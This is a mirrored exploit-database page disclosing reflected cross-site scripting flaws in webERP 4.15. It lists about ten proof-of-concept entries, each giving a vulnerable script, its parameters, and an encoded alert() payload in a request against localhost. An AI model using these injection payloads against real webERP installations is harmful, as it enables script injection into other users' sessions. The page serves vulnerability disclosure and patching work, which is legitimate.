webERP 4.15 - nsextt Multiple XSS Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1570416 漏洞类型
发布时间 2019-04-15 更新时间 2019-04-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019040128
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004B53)%252b%2522
# GET Request : http://localhost/webERP/webERP/AgedDebtors.php?nsextt=%22%2balert(0x004B53)%2b%22 
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x00490C)%252b%2522
# GET Request : http://localhost/webERP/webERP/CustomerAllocations.php?nsextt=%22%2balert(0x00490C)%2b%22 
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004F06)%252b%2522 
# GET Request : http://localhost/webERP/webERP/CustomerBalancesMovement.php?nsextt=%22%2balert(0x004F06)%2b%22 
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : NewReceipt,nsextt,Type,nsparamname
# Attack Pattern : %27%2balert(0x0047E5)%2b%27 
# GET Request : http://localhost/webERP/webERP/CustomerReceipt.php?NewReceipt='+alert(0x0047E5)+'&Type=Customer  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x0049AA)%252b%2522 
# GET Request : http://localhost/webERP/webERP/CustWhereAlloc.php?nsextt=%22%2balert(0x0049AA)%2b%22  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : FormID,AddToMenu,ScriptName,Title
# Attack Pattern : %27%2balert(0x003279)%2b%27  
# POST Request : http://localhost/webERP/webERP/Dashboard.php  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004C8E)%252b%2522 
# GET Request : http://localhost/webERP/webERP/DebtorsAtPeriodEnd.php?nsextt=%22%2balert(0x004C8E)%2b%22  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004BF0)%252b%2522 
# GET Request : http://localhost/webERP/webERP/PDFBankingSummary.php?nsextt=%22%2balert(0x004BF0)%2b%22   
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt,NewCredit,nsparamname
# Attack Pattern : %27%2balert(0x003279)%2b%27  
# GET Request : http://localhost/webERP/webERP/SelectCreditItems.php?NewCredit=Yes&nsextt=%22%2balert(0x0046E2)%2b%22   
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: webERP 4.15 - Multiple XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practise,
  multi-user business administration and accounting tools over the web.
===========================================================================================
# POC - XSS
# Parameters : nsextt,StockCat,FormID,Keywords,SupplierStockCode,ScriptName,StockCode,AddToMenu,Search,Title
# Attack Pattern : %27%2balert(0x0035E4)%2b%27  
# GET Request : http://localhost/webERP/webERP/SelectProduct.php  
===========================================================================================